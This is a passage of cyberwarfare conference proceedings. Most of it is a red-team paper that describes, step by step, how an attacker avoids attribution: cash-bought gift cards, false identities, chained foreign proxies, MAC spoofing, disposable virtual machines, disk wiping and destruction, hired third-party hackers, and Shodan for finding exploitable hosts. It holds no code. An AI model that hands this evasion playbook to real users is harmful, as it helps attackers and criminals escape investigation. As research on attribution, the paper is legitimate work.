attacks that have already occurred. When the internet was initially developed the idea was to create a<br />

simple communication scheme which was simple and open, allowing for evolution into a much more<br />

complex animal. Having gone through several revisions, it is time to update the protocols and<br />

methods used daily to decrease the ability and relative ease of cyber attack. This is of course going to<br />

be accomplished by setting long term strategic goals, and then funding technological initiatives which<br />

are then in turn supported by policy both domestic and internationally. The first step in supporting this<br />

strategy is to fund the minds that are interested in forming a safer internet. A internet which limits the<br />

211


Christopher Perr<br />

anonymity of attackers, separates classified networks from the unclassified, develops systems where<br />

security is integral in the design, and creates a robust network which recovers gracefully from error<br />

and attack while limiting the scope of that attack at every level. This is where funding is necessary for<br />

new research an innovation in the relatively immature field of computing and networks.<br />

7. Conclusion<br />

Cyberspace is dangerous and scary. The borders are vast, and the landscape is constantly changing.<br />

Fortunately the possibilities of operating in cyberspace offers excellent rewards and given an<br />

appropriate but flexible strategy, reinforcing policy measures, and the drive to guide technological<br />

development cyberspace can also be a safe place to operate. This paper should serve as a call to<br />

make strides in these three areas, and to humbly offer up a base guide to tackling both present and<br />

future issues in cyberspace.<br />

References<br />

Agence France-Presse, US military prepares for 'cyber command:' official | ABS-CBN News | Latest Philippine<br />

Headlines, Breaking News, Video, Analysis, Features. ABS-CBN News. Available at: http://www.abscbnnews.com/technology/04/24/09/us-military-prepares-cyber-command-official<br />

[Accessed September 11,<br />

2010].<br />

Alexander, K., Advanced Questions for Lieutenant General Keith Alexander, USA, Nominee for Commander,<br />

United States Cyber Command, Available at:<br />

http://docs.google.com/viewer?a=v&q=cache:Kcm4Wm7WxDcJ:armedservices.senate.gov/statemnt/2010/04%2520April/Alexander%252004-15-<br />

10.pdf+Advance+Questions+for+Lieutenant+General+Keith+Alexander,+USA+Nominee+for+Commander&<br />

hl=en&gl=us&pid=bl&srcid=ADGEESii_NfX8DuWogAeIT3BXixKWHsUgQjUlYpebRb4XQjwsDRhXLVTbXwl<br />

aGTT7EulMH-DBJeo4rim_l2kT3M32rWC7AxmMzROsxLQwQVOYDVY2Gi9pKohKDV89kkb-<br />

GHIOMwFll3A&sig=AHIEtbSnKTroECzRqeFhTGnXyvf4JMu62A [Accessed September 11, 2010].<br />

Arquilla, J., 2007. Information strategy and warfare : a guide to theory and practice, New York: Routledge.<br />

Baocun, W. & Fei, L., INFORMATION WARFARE. Available at:<br />

http://www.fas.org/irp/world/china/docs/iw_wang.htm [Accessed September 11, 2010].<br />

Campen, A., 1992. The first information war : the story of communications, computers, and intelligence systems<br />

in the Persian Gulf War, Fairfax Va.: AFCEA International Press.<br />

Clarke, R., 2010. Cyber war : the next threat to national security and what to do about it 1st ed., New York: Ecco.<br />

Department of Homeland Security, DHS | Office of Cybersecurity and Communications. Available at:<br />

http://www.dhs.gov/xabout/structure/gc_1185202475883.shtm [Accessed September 11, 2010].<br />

Fulghum, Israel used electronic attack in air strike against Syrian mystery target - ABC News. Available at:<br />

http://abcnews.go.com/Technology/story?id=3702807&page=1 [Accessed September 11, 2010].<br />

Leyden, J., 2008. Estonia fines man for DDoS attacks • The Register. The Register. Available at:<br />

http://www.theregister.co.uk/2008/01/24/estonian_ddos_fine/ [Accessed September 11, 2010].<br />

Markoff, J., Google Asks N.S.A. to Investigate Cyberattacks - NYTimes.com. Available at:<br />

http://www.nytimes.com/2010/02/05/science/05google.html?fta=y [Accessed September 11, 2010].<br />

Markoff, J. & Barboza, D., Chinese <strong>Academic</strong>s’ Paper on Cyberwar Sets Off Alarms in U.S. - NYTimes.com.<br />

Available at: http://www.nytimes.com/2010/03/21/world/asia/21grid.html?_r=1 [Accessed September 11,<br />

2010].<br />

Markoff, J., Sanger, D.E. & Shanker, T., CYBERWAR - In Digital Combat, U.S. Finds No Easy Deterrent - Series<br />

- NYTimes.com. Available at:<br />

http://query.nytimes.com/gst/fullpage.html?res=9404E4DE123BF935A15752C0A9669D8B63 [Accessed<br />

September 11, 2010].<br />

Miller, F.P., Vandome, A.F. & McBrewster, J., 2010. Information Operations Roadmap.<br />

Miniwatts Marketing Group, United States Internet Usage, Broadband and Telecommunications Reports -<br />

Statistics. Available at: http://www.internetworldstats.com/am/us.htm [Accessed September 11, 2010].<br />

msnbc.com staff, U.S. eyes N. Korea for ‘massive’ cyber attacks - Technology & science - Security - msnbc.com.<br />

Available at: http://www.msnbc.msn.com/id/31789294 [Accessed September 11, 2010].<br />

Office of Force Transformation, 2005. Implementation of Network-Centric Warfare, Office of Force<br />

Transformation.<br />

Reuters, FBI probes cyber attack on Citigroup: report | Reuters. Available at:<br />

http://www.reuters.com/article/idUSTRE5BL0I320091222 [Accessed September 11, 2010].<br />

Trias, E.D. & Bell, B.M., Cyber This, Cyber That . . . So What? Air & Space Power Journal, Spring 2010.<br />

Available at: http://www.airpower.maxwell.af.mil/airchronicles/apj/apj10/spr10/trias.html [Accessed<br />

September 11, 2010].<br />

Wallace, R., 2009. Spycraft : the secret history of the CIA's spytechs, from communism to Al-Qaeda, New York:<br />

Plume.<br />

Waterman, S., Analysis: Who cyber smacked Estonia? - UPI.com. Available at:<br />

http://www.upi.com/Business_News/Security-Industry/2007/06/11/Analysis-Who-cyber-smacked-<br />

Estonia/UPI-26831181580439/ [Accessed September 11, 2010].<br />

212


Catch me if you can: Cyber Anonymity<br />

David Rohret and Michael Kraft<br />

Joint Information Operations Warfare Center (JIOWC) Texas, USA<br />

drohret@ieee.org<br />

mkraft5@csc.com<br />

Abstract: Advances in network security and litigation have empowered and enabled corporations to conduct<br />

Internet and desktop surveillance on their employees to increase productivity and their customers to gain valuable<br />

marketing data. Governments have spent billions to monitor cyberspace and have entered agreements with<br />

corporations to provide surveillance data on adversarial groups, competitors, and citizenry (Reuters, 2010). The<br />

Chinese government’s monitoring of the Internet (Markoff, 2008), the United Kingdom’s plan to track every email,<br />

phone call, and website visited (Whitehead, 2010), and the recent announcement from the United States that a<br />

program named the “Perfect Citizen” (Bradley, 2010) will be used to identify those committing cybercrimes and<br />

terrorist activities. These government surveillance programs have many concerned that anonymity on the Internet<br />

is non-existent and that real objectivity and candidness found on news, educational, and research websites is<br />

being replaced with a “big brother” atmosphere; preventing open discussion and information transfers between<br />

domains. Although the initial intent of network and Internet monitoring may be honourable; terrorists, hackers,<br />

and cyber-criminals already have access to the necessary tools and methodologies to continue in their activities<br />

unabated. State and non-state adversaries can use these same tools and methodologies to divert malicious and<br />

offensive actions towards a common adversary, avoiding attribution while increasing tensions among non-actors.<br />

Concerned educators, scientists, and citizens are rebelling against Internet monitoring providing the impetus for<br />

developers and entrepreneurs to create methods, tools, and virtual private networks that provide secrecy for<br />

those wishing to remain invisible; avoiding detection from employers, law enforcement, and other government<br />

agencies (Ultimate-Anonymity, 2010). The intent of this research is to first briefly identify the efforts required by<br />

governments to track and monitor individuals and groups wishing to remain anonymous within the cyber community.<br />

The authors define “cyber community” as the boundaries within any tool, process, or mechanism utilizing<br />

Transmission Control Protocol (TCP)/ Internet Protocol (IP), or similar protocols that allow for the transfer and<br />

aggregation of information and data. In contrast, the authors will then identify a process to remain wholly anonymous<br />

in the context of an internet identity. This will be demonstrated in a step-by-step case study using a ”paranoid”<br />

approach to remaining anonymous.<br />

Keywords: anonymity, network, internet surveillance, foreign proxy, hacker, big brother<br />

1. Terms defined<br />

The term Internet anonymity, and the abstract or hypothetical optimum of remaining anonymous, have<br />

differing definitions based on the “completeness” of anonymity desired. In several definitions “anonymous”,<br />

is simply remaining obscure (Answers.com, 2010), and not necessarily completely hidden<br />

from site. In other definitions, anonymous refers to remaining nameless, without shape or form (wordnetweb.princeton.edu,<br />

2010), and this is the definition the authors have used throughout this paper.<br />

This theme also extends to other terms that describe deception, the destruction of data or misdirection;<br />

specifically, the completeness of the action being described. The word “government” will also be<br />

used in a manner that includes all government entities, including law enforcement, military, and intelligence<br />

agencies.<br />

2. Overview<br />

Network-centric red teams are charged with emulating known adversaries and hackers (remote and<br />

insider threats) using, for the most part, only open-source and publically accessible tools and software.<br />

Unlike penetration testers, who use exploits to validate vulnerabilities, red teams are responsible<br />

for viewing networks or systems from every angle to defeat defences in place. This will include,<br />

but is not limited to, physical security, biometrics, social engineering, and of course, preventing the<br />

blue team from assigning attribution to the red teams actions. In this type of security stress-test a client<br />

is able to fully realize their systems security posture, which encompasses much more than a vulnerability<br />

scan and penetration test.<br />

Governments and corporations have realized the advantages of communications and data transfers<br />

via the Internet for economical and defensive purposes. They have also realized the dangers and<br />

costs of cyber crimes, malicious hacking, espionage, and cyber warfare; developing new technologies<br />

and implementing new legislation to defend networks and to trace/track attacks to their electronic<br />

point of origin (EPO). Without verification and validation courts will not convict and governments are<br />

unwilling to counter attack as clear attribution cannot be assigned. In order to remain anonymous or<br />

213


David Rohret and Michael Kraft<br />

assign blame to another party, the authors use the Praestigiae Cone (Rohret & Jett, 2009) displayed<br />

in Figure 1. The Praestigiae Cone can be visualized as seven protective layers (cone architecture)<br />

used in multiple steps to allow hackers, adversaries, or any other group to operating from a cloaked<br />

vantage point. The organization or individual attempting to identify what the shields are hiding can<br />

attack any of them at one time, but cannot move from one layer to the next without first solving the<br />

initial “who-is” puzzle for the layer they have identified. Making the task of identifying the actual<br />

user(s) more difficult is that each shield is time-sensitive; creating a fast moving defensive environment<br />

that is held hostage to a cyber criminal’s (or users) schedule.<br />

Figure 1: The Praestigiae Cone is used to hide and deceive one from those trying to identify the<br />

original source of an attack or network traffic (Rohret & Jett, 2009<br />

As difficult as it appears for law enforcement and government agencies to crack all seven layers, it<br />

only takes one mistake or missed-step by an adversary or hacker to allow investigators to see their<br />

true identity. Therefore, the authors have provided a brief description of known capabilities to establish<br />

the requirement for an adversary to take the seemingly paranoid precautions identified later in this<br />

paper in order to remain anonymous.<br />

3. Identifying and tracking internet users<br />

“...the FBI successfully infected the anonymous source's computer, and they soon discovered<br />

his identity” (Begun, 2009).<br />

In order to quantify the actions taken to remain anonymous we must first identify the many ways an<br />

individual or group can be located, tracked, and discovered. By no means are the methods described<br />

below solely used for cyber crimes or cyber warfare, but they are a major part of a government’s arsenal<br />

in fighting cyber crime and dissidents. Because there are so many different tools and techniques<br />

used by different governments and agencies, the authors have generalized techniques using<br />

specific examples to represent the greater capabilities. This brief overview will help to demonstrate<br />

why a paranoid approach is required to protect an anonymous identity on the Internet.<br />

Trojans, Beacons, and Worms<br />

The above quote from Daniel Begun illustrates one way to identify illegal media downloads or snoopy<br />

hackers. The process is as easy as providing interesting material on known download sites with embedded<br />

Trojans or beacons that notify law enforcement of the violation. Although effective, it’s difficult<br />

for government agencies to target specific groups or individual violators as this process is more of a<br />

214


David Rohret and Michael Kraft<br />

reverse phishing expedition. For targeting specific groups such as cyber criminals or adversarial governments,<br />

similar techniques would be used with live data or in a well designed honeypot that seemingly<br />

held the type of data the targeted group would maintain on their site. The music industry has had<br />

minor successes using these techniques (Associated Press, 2005).<br />

Financial Transactions<br />

Financial transactions can easily be associated with an individual anywhere they take place. For an<br />

international economy to work, governments and corporations, often at odds with one-another, must<br />

work together to prevent crimes that threaten markets and currencies. Because the world has rapidly<br />

become digitized credit cards, Internet paying services, and smart phone purchases allow anyone<br />

with a bank account to be a consumer. Furthermore, most businesses and banks now utilize video<br />

surveillance at the point of transaction creating a scenario where even cash purchases of a serialnumbered<br />

commodity or a financial document can lead investigators to a digital picture of the perpetrator.<br />

The United States agency, The Financial Crimes Enforcement Network (FinCEN) was established<br />

in 1990 and is considered the leading expert in solving crimes involving financial transactions,<br />

to include cyber crimes (Kimery, 2010; FinCEN, 2010).<br />

Digital and Cellular Communications<br />

"It's time for you to get some new cell phones, quick," was the warning given to Brian Ross and his<br />

ABC News investigation team (Ross, 2006) by someone they considered an NSA insider. This older<br />

news story describes an agency leak that identified how intelligence agencies, (and presumably law<br />

enforcement agencies) are able to track individuals using telecommunications for activities they (the<br />

agency) deem interesting or counter to national security. Radio Frequency (RF) triangulation to pinpoint<br />

locations of smart phones and other on-line digital devices is also possible with the use of good<br />

spectrum analyzers and a direction finder. This applies to 802.11, 802.16, GSM, CDMA and other<br />

Internet Protocol (IP) over radio and wireless standards.<br />

Tracking Internet Traffic<br />

The most common method of identifying malicious Internet activity and attempting to identify the culprit<br />

is through network and Internet surveillance. Intrusion detection systems, intrusion prevention systems,<br />

intelligent and stateful firewalls, packet sniffers, etc, provide network administrators and cyber<br />

crime investigators powerful tools for identifying attack signatures and sophisticated pattern analysis’<br />

that help investigators attribute an attack or malicious actions to a specific group or individual. This is<br />

not to say they know the actual identity of the group or individuals involved, but rather, they can match<br />

patterns of attacks or actions with enough confidence to suggest that the same perpetrators were involved.<br />

These capabilities have become more precise in recent years as corporations and governments<br />

cooperate in sharing information and sensor data. For example, the marriage between the<br />

search engine giant Google and the NSA made headlines sending shock waves through the Internet<br />

community creating worries that anyone can be “spied” on at any time (Reuters, 2010). An adversary<br />

or malicious hacker must also assume that international arrangements and agreements have also<br />

been implemented providing world-wide coverage and tracing capabilities.<br />

Computer Forensics<br />

Possession of a suspect’s computer is the golden egg for investigators. The term computer forensics,<br />

for use in this paper, refers to identifying incriminating evidence on the suspects system or a storage<br />

device used by the suspect. Entire computer laboratories are dedicated to forensic analysis for identifying<br />

incriminating evidence; ranging from simple low-tech techniques to highly sophisticated electron<br />

interferometry. An example of a low-tech analysis would consist of the capture of a system that is still<br />

running and accessible; whereas electron interferometry involves reading open and closed memory<br />

gates on a system’s memory at temperatures below negative 60 Celsius, even if the system has been<br />

shut down for several minutes (Vourdas & Sanders, 1998).<br />

Physical Investigations<br />

“Feet” on the ground to identify patterns and locations are part of the final stage of an investigation to<br />

identify and/or catch a suspect. This includes using video surveillance from Internet cafes frequented<br />

215


David Rohret and Michael Kraft<br />

by the suspect or an old fashioned stake-out to catch them in the act. Cyber crime investigations are<br />

common place and many are high profile, prompting law enforcement agencies to allocate significant<br />

resources to rapidly solve cases.<br />

4. A paranoid approach to remaining anonymous<br />

Why a paranoid approach to anonymity? Governments, adversaries, corporations, cyber criminals,<br />

even cheating spouses require a repeatable process they can employ to accomplish sensitive activities<br />

across the World Wide Web without detection or retribution. In a recent article prepared for the<br />

North Atlantic Treaty Organization (NATO) Parliamentary Assembly (Myrli, 2010) the cost of cyber<br />

crimes to governments and corporations is reported to be over US $100B annually. In response to<br />

cyber crime, governments and corporations spend billions more on technology and methodologies to<br />

identify, track, and prosecute cyber criminals (Fenwick, 2010). Not only have governments increased<br />

expenditures and resources to combat cyber crime, there is now unprecedented cooperation among<br />

governments and corporations to provide data and information sharing to identify and/or capture offenders<br />

(Golubev, 2005). Therefore, for an adversary or cyber criminal to successfully use the internet<br />

for nefarious reasons and remain anonymous, they must take a holistic view of the security available<br />

to their intended targets; that is to say, they must assume each capability is available and successfully<br />

deployed. Just as a network security officer does not have the luxury of only defending against some<br />

or most of the vulnerabilities on their network, a cyber criminal or cyber warrior cannot depend on a<br />

law enforcement agency to only use some of the methods described in section 3.<br />

This paper is the result of research into adversarial capabilities in cyber warfare, specifically, how a<br />

network-centric red team, acting as the adversary, would prevent positive attribution after conducting<br />

network reconnaissance or an attack. The following case study reflects precautions and actions used<br />

to create the shields in the Praestigiae Cone, described in Figure 1; using combinations of publically<br />

available technology, services, and research. Figure 2 outlines the process of achieving the seven<br />

shields, resulting in complete anonymity. The details are explained using a scenario based on an actual<br />

case study involving a red team assessment on an enterprise network.<br />

Figure 2: A process for remaining anonymous in cyber space<br />

Scenario: The red team’s goal was to emulate a hackers capability to remotely identify and disable an<br />

automated network-controlled surveillance system that included wireless video, fence and ground<br />

sensors, autonomous vehicle sentries, and network security; without being identified as the adver-<br />

216


David Rohret and Michael Kraft<br />

sary. The red team assumed that all networks were monitored and Internet service providers, search<br />

engines, and even proxy services would provide information to authorities in a timely manner. Each<br />

action taken by the red team, and all services purchased and used, are publically available and operating<br />

in a legal capacity. The following steps provided Internet and network anonymity, allowing the<br />

red team to accomplish its mission without allowing security managers to assign attribution to the attack.<br />

Physical Security and Financial Shields<br />

The red team’s first step was to build laptop systems specifically for their requirement. This included<br />

downloading free VM software for the installation of multiple operating systems. By using freely distributed<br />

VM software, the red team was able to avoid having information identifying their use of VM<br />

software through registration services or processes (Oracle, 2010). Operating systems already configured<br />

for use in a VM environment were also available for public download and each download and<br />

installation was accomplished from a non-authenticating Internet cafe. Two anonymity proxy services<br />

were required and were purchased using two separate MasterCard gift cards that were separately<br />

purchased with cash at two convenience stores that were found not to be using video surveillance.<br />

Virtualization and Spoofing Shields<br />

Creating a system providing protection against evidence retrieval is vital for a red team emulating adversarial<br />

techniques. Virtual operating systems provide developers and administrators the capability to<br />

create instances of an entire network for testing and evaluation, similarly, cyber criminals and adversaries<br />

use virtual networks for pre-exploit testing and as disposable systems following an attack or<br />

exploitation. If all other layers of anonymity fail, it is imperative that attribution cannot be determined<br />

from information, logs, or data found on the attackers host system. In this case study, our red team<br />

used multiple pre-built virtual machines on re-usable host systems, creating temporary and disposable<br />

attack platforms. Continuing our paranoid approach, we used open-source resources to download<br />

and install the following files using a false identify:<br />

Virtual Machine Hosting Software: The authors downloaded Microsoft’s Virtual PC 2007 software.<br />

With Microsoft Virtual PC 2007, you can create and run one or more virtual machines (each with<br />

its own operating system) on a single computer. This provides you with the flexibility to use different<br />

operating systems on a single host platform (Microsoft, 2010).<br />

Virtual Machine Images: Virtual operating system images can be obtained in several ways; they<br />

can be loaded directly into the VM system (using un-registered software) or downloaded already<br />

built. Windows XP or Vista VM images are available at no cost from the National Institute of Standards<br />

and Technology (NIST, 2010), and a Linux distribution was also obtained from an opensource<br />

location (Back|Track-Linux.org, 2010). Hacker forums, how-to publications, and trial<br />

downloads also provide sources locations for acquiring operating systems to populate your virtual<br />

machines without a financial or registration trail.<br />

Host and VM System MAC Spoofing: Every network interface card (NIC) is assigned a unique<br />

serial number called a media access control (MAC) address. An investigator or network security<br />

officer can trace a MAC address in a similar way that an IP address is traced by simply using a<br />

packet sniffing tool, like Wireshark, and filtering traffic by the MAC. Many novice hackers or careless<br />

cyber criminals will neglect spoofing MAC addresses prior to an attack, and just as often, forget<br />

to change them back to the original following an attack. In the red team’s quest to eliminate<br />

any trace of their attacking systems on their host platforms, they used publically available freeware<br />

called Spoofmenow.exe (SourceForge, 2010) to change the MAC addresses of both the VM<br />

system and their host platforms. Once the red teams actions were completed (for each session),<br />

they returned the host system to the original MAC address and deleted the VM system. This action<br />

would prevent investigators from identifying the host system as the computer used for an attack,<br />

even if no other evidence was available. It was necessary to change the VM system’s MAC<br />

address for two reasons; first, changing the MAC address to a manufacturer that reflected the location<br />

of the proxy server used for the attack, created a better deception of where the attack<br />

originated from. Secondly, and just as importantly, to avoid identifying the system used as a VM<br />

system. Most vulnerability scanners will identify the MAC address of a VM system as a virtual machine.<br />

217


Proxy and Remailer Shields<br />

David Rohret and Michael Kraft<br />

The side effect of increased capabilities by law enforcement is an increase in on-line services to help<br />

defeat law enforcement capabilities, such as anonymous proxies and remailers. Proxies are servers<br />

that act as go-betweens, making requests for data on behalf of clients. A proxy receives a "request"<br />

for a file, website, or other resource from a client, connects to the remote site, and obtains the information<br />

sending it back to the client. Remote proxies can allow you to surf the Web privately without<br />

being monitored and are widely used by individuals who download copyrighted media or those who<br />

circumvent network security measures in order to view blocked Websites (Hazel Morgan, 2010).<br />

An anonymous remailer is an email service which receives client messages (with embedded instructions<br />

on where to send them) and then forwards the messages without revealing where they originally<br />

came from. By not maintaining a users list or a log of the addresses their messages were sent to, a<br />

remailer can ensure any message which has been forwarded leaves no internal information behind<br />

that could be used to break identity confidentiality (Wikipedia, 2010).<br />

Two proxy services were used by the red team; the first proxy service, Ultimate-Anonymity (Ultimate-<br />

Anonymity, 2010), was purchased using the first cash gift card and a false identity at a nonauthenticating<br />

wireless cafe. Red team members quickly set their proxy location to a proxy in India via<br />

an encrypted VPN. Using an on-line IP lookup after starting the anonymous proxy service the red<br />

team confirmed they were seen on the Internet as originating from the location in India, as shown in<br />

Figure 3.<br />

Figure 3: This screen capture was acquired using an IP lookup from the host system and identifies<br />

the host is associated with an IP address from an Internet service provider located in India<br />

and even provides the information in the host ISP’s primary customer languages<br />

The second proxy service, HideMyAss.com (HMA), was purchased using the second gift card from<br />

another non-authenticating wireless cafe while connected through the first proxy, using a different<br />

false identity (HideMyAss.com, 2010). HMA’s user-friendly interface allowed the red team to choose<br />

multiple proxies in the Netherlands and Russia, changing IP addresses every 10 minutes.<br />

Although anonymous proxy services advertise they do not maintain user logs and delete user information<br />

in a timely manner, it was assumed by the red team the anonymous proxy services would cooperate<br />

with investigators. Therefore the red team would not use each proxy service for more than<br />

one session, repeating the process for each follow-on action, using different proxy locations, session<br />

locations, and new identities.<br />

218


Data (Evidence) Removal Shield<br />

David Rohret and Michael Kraft<br />

There are various levels of paranoia which will dictate how one might try and destroy the computer<br />

evidence. One might have little paranoia and decide to just delete the virtual machine from the computer.<br />

A more nervous approach might include using a disk cleaner wiping a hard drive in accordance<br />

with the DoD 5220.22-M standard (www.usaid.gov, 2010), which features multiple overwrites of random<br />

characters. Open source programs like Darik's Boot and Nuke (DBAN) is a self-contained boot<br />

disk that securely wipes the hard disks of most computers. DBAN will automatically and completely<br />

delete the contents of any hard disk that it can detect, which makes it an appropriate utility for bulk or<br />

emergency data destruction (Sourceforge, 2010). Lastly, after completing disk scrubbing, the extreme<br />

case of paranoia might include destroying the computer by physically damaging the hard drives and<br />

memory.<br />

Location/Deception and Time Shields<br />

As discussed earlier, time is the adversary’s or cyber criminal’s ally. The end goal is to accomplish an<br />

action without being identified or having it attributed to your team. By using a disciplined approach<br />

and restricting the amount of time each session is executed, each proxy service is used, and an identity<br />

is held, investigators will be kept busy allocating resources to identify computers and users that no<br />

longer exist. Even if investigators are able to eventually locate one of the EPOs, the perpetrator will<br />

have completed their mission and moved onto a new location with a new identity. Solving computer<br />

crimes requires resources and specific skill sets that are not always readily available even to the most<br />

advanced cyber crime organizations. By remaining difficult to trace and providing multiple targets that<br />

are easily erased, authorities will not be able to focus their efforts in a timely enough manner to locate<br />

and positively identify the offender.<br />

The key component of keeping time as your ally is preventing a positive identification of your location.<br />

By location the authors refer to both the physical location of the attacker and their perceived location.<br />

Earlier we discussed the use of multiple non-authenticating Internet cafes and the use of multiple foreign<br />

proxies, one tunneled through the other, but there are other methods to hide your true locations;<br />

the use of third-party hackers and on-line resources that provide exploitable computers. Third-party<br />

hacking services are available and can be purchased using a gift card while logged onto a proxy service.<br />

Furio Gaming (Furio Gaming, 2010) is one such service that will either hack a system for you or<br />

will provide you the tools to do so. This service represents itself as a gaming and hacking company<br />

and is located in a foreign country providing a layer of anonymity in itself. Other on-line services, such<br />

as Shodanhq.com (SHODAN, 2010), provide an easy-to-use research tool allowing hackers to identify<br />

systems worldwide that are exploitable in every country. By identifying and exploiting a vulnerable<br />

system in a country that may not cooperate with the country you are working in, a cyber criminal can<br />

execute their objectives with little fear of attribution. Other methods for individuals or organizations<br />

with greater resources would be to setup and configure their own anonymous proxies in countries and<br />

locations that have liberal or non-existent cyber laws. For large scale cyber attacks or highly profitable<br />

schemes, this method may be more applicable and more robust.<br />

5. Summary<br />

The inexpensive solution to cyber anonymity outlined in this case study can easily be implemented<br />

with minimal resources and without expert skill levels. Movies and television shows, such as “24”<br />

(IMDB 24, 2010) and “Live Free or Die Hard” (IMDB Live Free or Die Hard, 2010) depict governments<br />

and advanced cyber techniques that can pinpoint network and Internet users in real time; but for the<br />

most part, these capabilities do not exist. The fact remains tracking a cyber criminal requires extensive<br />

resources and is a time consuming process involving multiple agencies and governments. It is<br />

also imperative that government decision makers be wary of assigning attribution to a specific country<br />

or group for an attack or malicious action as the current state of cyber defence and investigations rely<br />

heavily on the offending group to make a mistake that would provide positive identification. The authors<br />

do not intend to imply such capabilities cannot be or are not being developed, but rather the current<br />

state of Internet security and cyber laws do not provide sufficient capabilities and processes for<br />

positive attribution. As this case study has demonstrated, even if authorities are able to follow an attack<br />

or cyber crime to its electronic point of origin, that trail will only lead to a non-traceable false identity.<br />

Catch me if you can.<br />

219


References<br />

David Rohret and Michael Kraft<br />

Answers.com. http://www.answers.com/topic/anonymity Anonymity definition. Oct 2010.<br />

Associated Press. Teen Convicted of Illegal Net Downloads. http://www.msnbc.msn.com/id/7122133/. March 7,<br />

2005.<br />

Back|Track-Linux.org. VMware Fusion 3.1. http://www.backtrack-linux.org/downloads/. Oct 2010.<br />

Begun, Daniel, A. FBI Uses Spyware to Capture Cyber Criminals. Hothardware.com, Monday, April 20, 2009.<br />

http://hothardware.com/News/FBI-Uses-Spyware-to-Capture-Cyber-Criminals/. 1 Oct 2010.<br />

Bradley, Tony. NSA 'Perfect Citizen' Raises 'Big Brother' Concerns, PC World, July 08, 2010 02:02 PM ET,<br />

http://www.networkworld.com/news/2010/070810-nsa-perfect-citizen-raises-big.html. Oct 2010.<br />

Fenwick, Samual, Dr. Cyber security – believe the hype? Industrial Fuels and Power.<br />

http://www.ifandp.com/article/006583.html. August 18, 2010.<br />

FinCEN. http://www.fincen.gov/. Oct 2010.<br />

Furio Gaming. http://www.furiogaming.com/index.php?page=home. Oct 2010.<br />

Golubev, Vladimir. International Cooperation in Fighting Cybercrime. Computer Crime Research Center,<br />

http://www.crime-research.org/articles/Golubev0405. April 16 2005.<br />

Hazel Morgan, e. C. (2010, March). Information on How Proxies Work. Retrieved October 12, 2010, from eHOW:<br />

http://www.ehow.com/facts_6054712_information-proxies-work.html.<br />

HideMyAss.com; Anonymous remailer and proxy service, http://www.HideMyAss.com. April 13, 2010.<br />

IMDB. 24 (2001 - 2010). http://www.imdb.com/title/tt0285331/. Oct 2010.<br />

IMDB. Live Free or Die Hard (2007). http://www.imdb.com/title/tt0337978/. Oct 2010.<br />

Kimery, Anthony. Big Brother Wants to Look in your Bank Account<br />

http://www.wired.com/wired/archive/1.06/big.brother_pr.html. 25 Sep 2010.<br />

Markoff, John. Surveillance of Skype Messages Found in China. New York Times: Internet. 1 October, 2008.<br />

Microsoft. Microsoft Virtual PC 2007. http://www.microsoft.com/downloads/en/details.aspx?FamilyId=04D26402-<br />

3199-48A3-AFA2-2DC0B40A73B6&displaylang=en. Oct 2010.<br />

Myrli, Sverre. 173 DSCFC 09 E bis – NATO and Cyber Defence. NATO Parliamentary Assembly,<br />

http://www.nato-pa.int/default.asp?SHORTCUT=1782. Sep 10 2010.<br />

NIST. National Institute of Standards and Technologies. http://csrc.nist.gov/ Oct 2010.<br />

Oracle. Oracle VM VirtualBox. http://dlc.sun.com/virtualbox/vboxdownload.html. Oct 2010.<br />

Reuters. Google, NSA to team up in cyberattack probe. February 4, 2010.<br />

Rohret, David, M. And Jett, Andrew. Red Teaming; A Guide to Non-kinetic Warfare. 2009.<br />

Ross, Brian. Federal Source to ABC News: We Know Who You're Calling. ABC News.<br />

http://blogs.abcnews.com/theblotter/2006/05/federal_source_.html. May 15, 2006.<br />

SHODAN. http://www.shodanhq.com/. Oct 2010.<br />

Sourceforge. (n.d.). Darik's Boot And Nuke (DBAN). http://www.dban.org/. Oct 2010.<br />

SourceForge. http://sourceforge.net/projects/spoof-me-now/files/Spoof-Me-<br />

Now%20%28No%20Installer%29.zip/download. September 2010.<br />

Ultimate-Anonymity. Anonymous remailer and proxy service. http://www.ultimate-anonymity.com/ July 7, 2010.<br />

USAid.gov. www.usaid.gov. http://www.usaid.gov/policy/ads/500/d522022m.pdf. October 2010.<br />

Vourdas, A., and Sanders, B. Determination of quantized electromagnetic-field state via electron interferometry<br />

1998 Europhys. Lett. 43 659 doi: 10.1209/epl/i1998-00414-0.<br />

Whitehead, Tim. Every email and web site to be stored. Telegraph.co.uk.<br />

http://www.telegraph.co.uk/technology/news/8075563/Every-email-and-website-to-be-stored.html 20 Oct<br />

2010.<br />

Wikipedia. (2010, July 14). Anonymous remailer. Retrieved October 12, 2010, from Wikipedia:<br />

http://en.wikipedia.org/wiki/Anonymous_remailer.<br />

Worldnet. the State of being anonymous; nameless. http://wordnetweb.princeton.edu/perl/webwn?s=anonymity:<br />

Oct 2010.<br />

220


Neutrality in the Context of Cyberwar<br />

Julie Ryan 1 and Daniel Ryan 2<br />

1 The George Washington University, Washington, USA<br />

2 National Defense University, Washington, USA<br />

jjchryan@gwu.edu<br />

ryand@ndu.edu<br />

Abstract: This paper will examine the legal antecedents of the concepts of neutrality and current enforceability of<br />

declarations of neutrality in the context of information operations amongst belligerents. This is a non-trivial point<br />

of understanding, given the potential for belligerents to use and abuse infrastructure elements owned and/or<br />

operated by nation states desiring to remain neutral. The analysis will consider the instantiated concepts of<br />

neutrality, the potential for expanding or contracting the concepts of neutrality in the context of cyberwar, and the<br />

possibility of erosion of neutrality in cyberwar scenarios. We have a notion enshrined in international law that<br />

says that you don't lose your neutrality if belligerents use your telephone lines or telegraph lines to communicate<br />

even if they are crossing your territory, even if they are passing operational orders. The problem with cyberwar is<br />

that they are potentially not just transferring orders but also potentially weapons -- cyber-weapons. So it becomes<br />

a more complex problem and the challenge is to understand at what point the nation state should be required to<br />

act, or if such a point exists at all. This analysis will examine the intersection between technology and law in<br />

regards to this issue.<br />

Keywords: neutrality; law of armed conflict; international humanitarian law; cyberwar<br />

1. War and the laws of armed conflict<br />

During less than one percent of the last two million or so years of human evolution has agriculture and<br />

animal husbandry replaced the hunter-gatherer existence as a characteristic way of life. (Gat 2006, p.<br />

4) During the hunter-gatherer phase, humans engaged in endemic primitive warfare. (Keegan 1193,<br />

p. 5 and pp. 115ff) As technology evolved, it influenced – and was influenced by – warfare, producing<br />

revolutions in military affairs. (Boot 2006, p. 8) The longbow, stirrups, gunpowder, conoidal bullets,<br />

machine guns, aircraft, radar, sonar, rockets and spacecraft, and now computers and precisionguided<br />

weapons, are but a small sample of the technologies that have continuously changed the face<br />

of warfare throughout history. As warfare became the province of nation-states, belligerencies<br />

between and among nations led to some states declaring their intent to remain neutral, and the<br />

